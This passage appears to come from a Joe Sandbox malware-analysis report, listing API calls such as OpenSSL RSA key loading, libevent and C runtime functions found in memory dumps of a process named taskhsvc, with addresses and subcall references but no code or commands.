      • Part of subcall function 003365C1: RSA_new.LIBEAY32 ref: 003365D1
      • Part of subcall function 003365C1: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,002DF274), ref: 00336613
      • Part of subcall function 003365C1: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,002DF274), ref: 0033662E
      • Part of subcall function 00336A40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336A9C
      • Part of subcall function 00336A40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336ADB
      • Part of subcall function 00336A40: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B2E
      • Part of subcall function 00336A40: BIO_new_mem_buf.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B40
      • Part of subcall function 00336A40: RSA_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B68
      • Part of subcall function 00336A40: PEM_read_bio_RSAPrivateKey.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B8B
      • Part of subcall function 00336A40: BIO_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336B9E
      • Part of subcall function 00336A40: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF2AC), ref: 00336BD8
      • Part of subcall function 00336FC3: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 0033701F
      • Part of subcall function 00336FC3: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 0033705E
      • Part of subcall function 00336FC3: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 003370A0
      • Part of subcall function 00336FC3: BIO_s_mem.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 003370A5
      • Part of subcall function 00336FC3: BIO_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 003370AD
      • Part of subcall function 00336FC3: BIO_write.LIBEAY32 ref: 003370D9
      • Part of subcall function 00336FC3: RSA_free.LIBEAY32 ref: 003370F1
      • Part of subcall function 00336FC3: PEM_read_bio_RSAPublicKey.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 00337114
      • Part of subcall function 00336FC3: BIO_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 00337127
      • Part of subcall function 00336FC3: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DF1E1), ref: 00337161
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 002DDDF8: __stack_chk_fail.LIBSSP-0 ref: 002DE314
      • Part of subcall function 00322871: __stack_chk_fail.LIBSSP-0 ref: 003228C7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00270DCB
    • abort.MSVCRT ref: 00270E0A
      • Part of subcall function 0026D20C: __stack_chk_fail.LIBSSP-0 ref: 0026D242
    • abort.MSVCRT ref: 00270EA8
      • Part of subcall function 00273FB0: __stack_chk_fail.LIBSSP-0 ref: 00274068
      • Part of subcall function 00270C0E: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270EEE), ref: 00270C6B
      • Part of subcall function 00270C0E: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00270EEE), ref: 00270CAA
      • Part of subcall function 00270C0E: __stack_chk_fail.LIBSSP-0 ref: 00270D58
    • abort.MSVCRT ref: 00270F7D
    • abort.MSVCRT ref: 00270FC0
    • abort.MSVCRT ref: 00271023
    • abort.MSVCRT ref: 00271066
    • abort.MSVCRT ref: 002710C9
    • abort.MSVCRT ref: 0027110C
      • Part of subcall function 0027734D: time.MSVCRT ref: 0027736A
      • Part of subcall function 0027734D: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271149), ref: 002773AC
      • Part of subcall function 0027734D: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271149), ref: 002773D2
      • Part of subcall function 00277229: time.MSVCRT ref: 00277246
      • Part of subcall function 00277229: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00272A0F), ref: 00277288
      • Part of subcall function 00277229: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00272A0F), ref: 002772BA
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • __stack_chk_fail.LIBSSP-0 ref: 00271337
      • Part of subcall function 00270961: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271238), ref: 002709B8
      • Part of subcall function 00270961: memcpy.MSVCRT ref: 002709E1
      • Part of subcall function 00270961: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00271238), ref: 002709F4
      • Part of subcall function 00273E8E: abort.MSVCRT ref: 00273F1D
      • Part of subcall function 00273E8E: abort.MSVCRT ref: 00273F92
      • Part of subcall function 00273E8E: __stack_chk_fail.LIBSSP-0 ref: 00273FA3
      • Part of subcall function 00272A33: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0027132B), ref: 00272A68
      • Part of subcall function 0027BECE: __stack_chk_fail.LIBSSP-0 ref: 0027BF83
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855138358.00267000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00312523: strftime.MSVCRT ref: 00312608
      • Part of subcall function 00312523: __stack_chk_fail.LIBSSP-0 ref: 0031266E
    • memcpy.MSVCRT ref: 00312B34
      • Part of subcall function 003123FC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,003129BA), ref: 0031247D
      • Part of subcall function 00314F0D: strlen.MSVCRT ref: 00314FA0
      • Part of subcall function 00314F0D: strlen.MSVCRT ref: 00315010
      • Part of subcall function 00314F0D: memcpy.MSVCRT ref: 00315067
      • Part of subcall function 00314F0D: __stack_chk_fail.LIBSSP-0 ref: 00315080
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • strlen.MSVCRT ref: 00312A07
    • memcpy.MSVCRT ref: 00312A46
      • Part of subcall function 00316065: __stack_chk_fail.LIBSSP-0 ref: 00316100
    • __stack_chk_fail.LIBSSP-0 ref: 00312B6F
      • Part of subcall function 00315895: strlen.MSVCRT ref: 003158CA
      • Part of subcall function 00315895: __stack_chk_fail.LIBSSP-0 ref: 00315904
    • strlen.MSVCRT ref: 00312ACE
    • memcpy.MSVCRT ref: 00312AFA
      • Part of subcall function 003F8710: strlen.MSVCRT ref: 003F872A
      • Part of subcall function 003F8710: malloc.MSVCRT ref: 003F8736
      • Part of subcall function 003F8710: strlen.MSVCRT ref: 003F8740
      • Part of subcall function 003F8710: malloc.MSVCRT ref: 003F874C
      • Part of subcall function 003F8710: free.MSVCRT ref: 003F87AC
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0021F729: abort.MSVCRT ref: 0021F776
      • Part of subcall function 0021F729: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,0021F7A7,?,?,?,?,?,00206074), ref: 0021F78B
      • Part of subcall function 00315561: __stack_chk_fail.LIBSSP-0 ref: 003155CC
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
    • abort.MSVCRT ref: 002207B2
    • time.MSVCRT ref: 00220850
      • Part of subcall function 0027A07D: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00208E4B), ref: 0027A0A6
      • Part of subcall function 001EEEF2: __stack_chk_fail.LIBSSP-0 ref: 001EF046
      • Part of subcall function 001C1929: __stack_chk_fail.LIBSSP-0 ref: 001C194F
      • Part of subcall function 001EEBE4: __stack_chk_fail.LIBSSP-0 ref: 001EEE36
      • Part of subcall function 00231A28: abort.MSVCRT ref: 00231A78
      • Part of subcall function 00231A28: memset.MSVCRT ref: 00231AA4
      • Part of subcall function 00231A28: __stack_chk_fail.LIBSSP-0 ref: 00231AE6
      • Part of subcall function 001F80E5: event_new.LIBEVENT-2-0-5 ref: 001F8149
      • Part of subcall function 001F80E5: abort.MSVCRT ref: 001F8190
      • Part of subcall function 001F80E5: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002207F2), ref: 001F81C0
      • Part of subcall function 002EA547: abort.MSVCRT ref: 002EA5CA
      • Part of subcall function 002EA547: event_new.LIBEVENT-2-0-5 ref: 002EA5F7
      • Part of subcall function 002EA547: __stack_chk_fail.LIBSSP-0 ref: 002EA635
    • abort.MSVCRT ref: 00220958
      • Part of subcall function 00317AE2: __stack_chk_fail.LIBSSP-0 ref: 00317B32
      • Part of subcall function 003259C5: abort.MSVCRT ref: 00325A21
      • Part of subcall function 003259C5: _stati64.MSVCRT ref: 00325A8E
      • Part of subcall function 003259C5: free.MSVCRT ref: 00325AA7
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325AD7
      • Part of subcall function 003259C5: _mkdir.MSVCRT ref: 00325B54
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325B72
      • Part of subcall function 003259C5: __stack_chk_fail.LIBSSP-0 ref: 00325C45
    • free.MSVCRT ref: 00220AD3
      • Part of subcall function 003134C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00220AE4), ref: 00313519
      • Part of subcall function 003134C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00220AE4), ref: 003136B7
      • Part of subcall function 003134C5: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,00220AE4), ref: 003136D4
      • Part of subcall function 0031721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00316FE0), ref: 0031724B
      • Part of subcall function 001F4130: abort.MSVCRT ref: 001F419F
      • Part of subcall function 001F4130: __stack_chk_fail.LIBSSP-0 ref: 001F43C1
      • Part of subcall function 0031470B: abort.MSVCRT ref: 0031475B
      • Part of subcall function 0031470B: strlen.MSVCRT ref: 0031481E
      • Part of subcall function 0031470B: abort.MSVCRT ref: 003148E2
      • Part of subcall function 0031470B: __stack_chk_fail.LIBSSP-0 ref: 003148FF
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0031490C: abort.MSVCRT ref: 00314959
      • Part of subcall function 0031490C: abort.MSVCRT ref: 00314A03
      • Part of subcall function 0031490C: __stack_chk_fail.LIBSSP-0 ref: 00314A20
      • Part of subcall function 00314268: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00220ABA), ref: 0031431D
      • Part of subcall function 00314268: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00220ABA), ref: 0031437D
      • Part of subcall function 00314268: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00220ABA), ref: 0031439E
      • Part of subcall function 00314B17: abort.MSVCRT ref: 00314B64
      • Part of subcall function 00314B17: abort.MSVCRT ref: 00314BD4
      • Part of subcall function 00314B17: __stack_chk_fail.LIBSSP-0 ref: 00314BF1
      • Part of subcall function 0022B2E4: _fileno.MSVCRT ref: 0022B634
      • Part of subcall function 0022B2E4: strcmp.MSVCRT ref: 0022B741
      • Part of subcall function 0022B2E4: strerror.MSVCRT ref: 0022B78B
      • Part of subcall function 0022B2E4: free.MSVCRT ref: 0022B7DF
      • Part of subcall function 0022B2E4: free.MSVCRT ref: 0022B860
      • Part of subcall function 0022B2E4: free.MSVCRT ref: 0022B89E
      • Part of subcall function 0022B2E4: __stack_chk_fail.LIBSSP-0 ref: 0022B900
      • Part of subcall function 00316107: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161A4
      • Part of subcall function 00316107: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161B7
      • Part of subcall function 003190A8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002208EC), ref: 00319106
      • Part of subcall function 00330A40: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00220731), ref: 00330A60
    • abort.MSVCRT ref: 00220DBF
    • __stack_chk_fail.LIBSSP-0 ref: 00220EE6
      • Part of subcall function 00317969: abort.MSVCRT ref: 00317A89
      • Part of subcall function 00317969: __stack_chk_fail.LIBSSP-0 ref: 00317AB4
      • Part of subcall function 00314A27: abort.MSVCRT ref: 00314A74
      • Part of subcall function 00314A27: abort.MSVCRT ref: 00314AEE
      • Part of subcall function 00314A27: __stack_chk_fail.LIBSSP-0 ref: 00314B10
      • Part of subcall function 001F7582: __stack_chk_fail.LIBSSP-0 ref: 001F76E8
      • Part of subcall function 001E8CDE: __stack_chk_fail.LIBSSP-0 ref: 001E8DE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 00328790: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002206E9), ref: 003287AC
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • abort.MSVCRT ref: 00325D72
    • abort.MSVCRT ref: 00325DB1
    • free.MSVCRT ref: 00325FFF
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00325DF6
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 00316107: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161A4
      • Part of subcall function 00316107: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161B7
      • Part of subcall function 003159C4: _open.MSVCRT ref: 00315A44
      • Part of subcall function 003159C4: __stack_chk_fail.LIBSSP-0 ref: 00315A5A
    • strerror.MSVCRT ref: 00325ECF
    • __stack_chk_fail.LIBSSP-0 ref: 0032601B
      • Part of subcall function 00316BC4: _lseek.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00325F20), ref: 00316BF5
      • Part of subcall function 00316BC4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00325F20), ref: 00316C12
    • strerror.MSVCRT ref: 00325F30
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • _close.MSVCRT ref: 00325F8C
    • free.MSVCRT ref: 00325FB5
    • free.MSVCRT ref: 00325FDD
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    • memset.MSVCRT ref: 0022D62C
      • Part of subcall function 0031AD40: abort.MSVCRT ref: 0031ADAF
      • Part of subcall function 0031AD40: abort.MSVCRT ref: 0031ADEE
      • Part of subcall function 0031AD40: strchr.MSVCRT ref: 0031AE3D
      • Part of subcall function 0031AD40: strstr.MSVCRT ref: 0031AE5A
      • Part of subcall function 0031AD40: strchr.MSVCRT ref: 0031AE76
      • Part of subcall function 0031AD40: abort.MSVCRT ref: 0031AEE4
      • Part of subcall function 0031AD40: strlen.MSVCRT ref: 0031AF08
      • Part of subcall function 0031AD40: __stack_chk_fail.LIBSSP-0 ref: 0031AFED
    • strchr.MSVCRT ref: 0022D699
      • Part of subcall function 003223BF: strlen.MSVCRT ref: 003223E1
      • Part of subcall function 003223BF: strncmp.MSVCRT ref: 003223FD
      • Part of subcall function 003223BF: __stack_chk_fail.LIBSSP-0 ref: 0032240D
    • strlen.MSVCRT ref: 0022D73F
      • Part of subcall function 00331E6E: memset.MSVCRT ref: 00331EE0
      • Part of subcall function 00331E6E: abort.MSVCRT ref: 00331F97
      • Part of subcall function 00331E6E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0026CC39), ref: 00331FB1
      • Part of subcall function 0032248D: strlen.MSVCRT ref: 003224AF
      • Part of subcall function 0032248D: __stack_chk_fail.LIBSSP-0 ref: 003224DD
      • Part of subcall function 0032F113: abort.MSVCRT ref: 0032F189
      • Part of subcall function 0032F113: abort.MSVCRT ref: 0032F1C8
      • Part of subcall function 0032F113: abort.MSVCRT ref: 0032F207
      • Part of subcall function 0032F113: free.MSVCRT ref: 0032F28C
      • Part of subcall function 0032F113: __stack_chk_fail.LIBSSP-0 ref: 0032F2A6
      • Part of subcall function 0021F6D4: __stack_chk_fail.LIBSSP-0 ref: 0021F6FB
    • free.MSVCRT ref: 0022DB91
      • Part of subcall function 0032326B: __stack_chk_fail.LIBSSP-0 ref: 003233C7
      • Part of subcall function 00322B81: __stack_chk_fail.LIBSSP-0 ref: 00322BBD
      • Part of subcall function 0032F2AD: abort.MSVCRT ref: 0032F30F
      • Part of subcall function 0032F2AD: abort.MSVCRT ref: 0032F34E
      • Part of subcall function 0032F2AD: abort.MSVCRT ref: 0032F38D
      • Part of subcall function 0032F2AD: __stack_chk_fail.LIBSSP-0 ref: 0032F3FD
    • __stack_chk_fail.LIBSSP-0 ref: 0022DBB1
      • Part of subcall function 0032E186: abort.MSVCRT ref: 0032E1F1
      • Part of subcall function 0032E186: strlen.MSVCRT ref: 0032E213
      • Part of subcall function 0032E186: free.MSVCRT ref: 0032E2C3
      • Part of subcall function 0032E186: __stack_chk_fail.LIBSSP-0 ref: 0032E2DD
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0024E04C: __stack_chk_fail.LIBSSP-0 ref: 0024E0EB
      • Part of subcall function 0024E0F2: __stack_chk_fail.LIBSSP-0 ref: 0024E175
      • Part of subcall function 00323938: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FF97), ref: 00323967
      • Part of subcall function 00323938: __stack_chk_fail.LIBSSP-0 ref: 003239A8
    • free.MSVCRT ref: 0022DB41
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00322F87: strtol.MSVCRT ref: 00322FFB
      • Part of subcall function 00322F87: __stack_chk_fail.LIBSSP-0 ref: 003230F2
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 001DE588
    • abort.MSVCRT ref: 001DE5C7
    • abort.MSVCRT ref: 001DE60E
    • abort.MSVCRT ref: 001DE655
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 001DC6F2: __stack_chk_fail.LIBSSP-0 ref: 001DC728
    • abort.MSVCRT ref: 001DE730
    • __stack_chk_fail.LIBSSP-0 ref: 001DE7A0
      • Part of subcall function 00211618: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001DE759), ref: 0021166F
      • Part of subcall function 00211618: __stack_chk_fail.LIBSSP-0(?), ref: 002116CD
      • Part of subcall function 002EAE33: abort.MSVCRT ref: 002EAE8A
      • Part of subcall function 002EAE33: abort.MSVCRT ref: 002EAECC
      • Part of subcall function 002EAE33: __stack_chk_fail.LIBSSP-0 ref: 002EAFEA
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 002CE121: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C6409), ref: 002CE1A2
    • event_active.LIBEVENT-2-0-5 ref: 001C6458
    • time.MSVCRT ref: 001C648C
      • Part of subcall function 0032545C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA788), ref: 00325486
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
    • event_base_loop.LIBEVENT-2-0-5 ref: 001C64B2
    • __stack_chk_fail.LIBSSP-0 ref: 001C65E4
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 003EC319: event_base_get_method.LIBEVENT-2-0-5 ref: 003EC331
      • Part of subcall function 003EC319: __stack_chk_fail.LIBSSP-0 ref: 003EC341
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001C3000
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001C16C0: abort.MSVCRT ref: 001C172A
      • Part of subcall function 001C16C0: __stack_chk_fail.LIBSSP-0 ref: 001C173D
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
    • time.MSVCRT ref: 001C31A4
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4826
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4871
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F48BC
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4AD9
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B41
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B88
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4BDA
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D10
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D63
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4DF6
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4E47
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4EF1
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F37
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F96
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4FE8
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5076
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F50CD
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5636
      • Part of subcall function 001F47D0: __stack_chk_fail.LIBSSP-0 ref: 001F565A
    • __stack_chk_fail.LIBSSP-0 ref: 001C31D5
      • Part of subcall function 001C2D88: __stack_chk_fail.LIBSSP-0 ref: 001C2DFB
      • Part of subcall function 001E8CDE: __stack_chk_fail.LIBSSP-0 ref: 001E8DE1
      • Part of subcall function 00206E53: abort.MSVCRT(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EA5
      • Part of subcall function 00206E53: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EB6
      • Part of subcall function 00206E23: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C3569), ref: 00206E4C
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 002737EC
    • abort.MSVCRT ref: 0027382B
      • Part of subcall function 0026D20C: __stack_chk_fail.LIBSSP-0 ref: 0026D242
    • abort.MSVCRT ref: 0027387B
      • Part of subcall function 002772C1: time.MSVCRT ref: 002772DE
      • Part of subcall function 002772C1: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002738B0), ref: 00277320
      • Part of subcall function 002772C1: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002738B0), ref: 00277346
      • Part of subcall function 0026D198: __stack_chk_fail.LIBSSP-0 ref: 0026D1CB
    • abort.MSVCRT ref: 0027395E
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • memcpy.MSVCRT ref: 002739F6
      • Part of subcall function 00270AE8: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00273A06), ref: 00270B3F
      • Part of subcall function 00270AE8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00273A06), ref: 00270B74
    • __stack_chk_fail.LIBSSP-0 ref: 00273AAC
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
